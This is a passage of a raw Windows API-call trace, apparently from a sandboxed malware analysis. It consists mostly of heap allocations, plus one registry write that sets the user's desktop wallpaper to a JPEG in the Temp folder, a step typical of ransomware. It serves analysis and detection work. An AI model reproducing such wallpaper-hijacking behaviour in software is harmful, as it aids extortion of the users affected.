[0285.286] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0285.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0285.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0285.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6e8 [0285.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0285.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0285.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa880 [0285.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0285.287] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf440 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0285.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0285.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0285.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0285.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0285.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0285.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0285.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0285.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0285.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0285.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0285.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0285.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0285.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0285.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0285.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0285.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0285.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0285.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0285.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0285.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0285.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0285.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0285.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0285.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0285.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0285.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0285.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0285.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0285.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0285.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0285.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0285.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b35e0 [0285.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0285.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0285.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0285.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0285.290] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0285.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0285.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0285.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0285.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0285.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0285.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0285.290] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8bf858, lpdwDisposition=0x8bf874 | out: phkResult=0x8bf858*=0x294, lpdwDisposition=0x8bf874*=0x2) returned 0x0 [0285.290] RegSetValueExW (in: hKey=0x294, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg", cbData=0x58 | out: lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0285.291] RegCloseKey (hKey=0x294) returned 0x0 [0285.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b35e0 | out: hHeap=0x25c0000) returned 1 [0285.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0285.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0285.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0285.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0285.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0285.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0285.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0285.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0285.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0285.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0285.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0285.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0285.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0285.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0285.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0285.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0285.292] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0285.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0285.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0285.292] CharUpperBuffW (in: lpsz="A4200F01243", cchLength=0xb | out: lpsz="A4200F01243") returned 0xb [0285.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0285.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0285.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0285.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1468 [0285.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0285.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0285.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0285.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0285.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0285.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0285.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0285.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0285.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0285.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0285.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0285.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0285.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0285.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0285.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0285.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0285.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa268 [0285.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0285.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0285.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0285.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0285.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0285.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0285.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0285.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0285.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0285.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0285.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0285.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0285.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0285.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa508 [0285.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa400 [0285.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0285.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0285.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0285.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0285.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0285.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0285.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0285.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0285.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0285.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0285.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0285.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0285.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa400 [0285.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa508 [0285.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0285.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0285.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0285.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0285.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0285.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0285.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0285.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0285.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0285.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0285.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0285.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0285.297] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0285.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0285.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0285.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0285.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0285.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0285.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0285.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0285.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0285.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0285.298] CharUpperBuffW (in: lpsz="SSA4200F01243", cchLength=0xd | out: lpsz="SSA4200F01243") returned 0xd [0285.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0285.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0285.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0285.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0285.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0285.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0285.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0285.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0285.298] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0285.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0285.298] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0285.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0285.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0285.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0285.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0285.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0285.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0285.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0285.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0285.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0285.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0285.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0285.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0285.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0285.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0285.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0285.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0285.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0285.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0285.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0285.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0285.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0285.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0285.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0285.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0285.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0285.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0285.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0285.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0285.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0285.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0285.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0285.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0285.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0285.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0285.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0285.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0285.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0285.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0285.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0285.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0285.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0285.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0285.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0285.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0285.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0285.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0285.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0285.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0285.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0285.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0285.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0285.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0285.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0285.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0285.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0285.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0285.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0285.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0285.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0285.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0285.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0285.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0285.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0285.303] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0285.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0285.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0285.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0285.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0285.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0285.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0285.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0285.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0285.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0285.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0285.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0285.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0285.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0285.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0285.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) 